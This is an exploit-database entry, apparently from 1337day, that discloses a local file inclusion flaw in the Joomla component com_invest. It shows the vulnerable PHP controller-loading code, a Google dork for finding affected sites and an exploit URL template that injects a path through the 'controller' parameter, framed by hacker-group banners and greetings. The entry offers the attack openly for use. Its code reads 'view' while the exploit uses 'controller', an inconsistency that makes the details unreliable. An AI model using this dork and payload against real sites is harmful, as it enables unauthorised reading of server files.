Joomla Component com_invest LFI Vulnerability



EKU-ID: 1903 CVE: OSVDB-ID:
Author: Caddy-dz Published: 2012-04-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Caddy-dz member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

####
# Exploit Title: Joomla Component com_invest LFI Vulnerability
# Author: Caddy-Dz
# Facebook Page: http://www.facebook.com/ALG.Cyber.Army
# E-mail: islam_babia@hotmail.com
# Category:: webapps
# Plugin: http://software.skuzet.nl/component/option,com_phocadownload/Itemid,3/id,7/view,category/
# Google Dork: inurl:com_invest
# Security Risk: medium
# Tested on: Windows Seven Edition Integral / French
####

# Sp Greetz To 1337day Team


[*] Vulnerable Code :

// get controller
if ($controller = JRequest::getVar('view')) {
$path = JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php';
if (file_exists($path)) {
require_once($path);
} else {
JError::raiseError(JText::_('unknown controller'));
}


[*] Exploit :

http://127.0.0.1/joomla/index.php?com_invest&controller=[LFI%]



# Greets To : ==============================================================================
#  The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates ,
#  jos_ali_joe , All Exploit-Id Team ,  (exploit-id.com) , (1337day.com) , (exploit-db.com)
#  ... And All Algerian Hax0rs
============================================================================================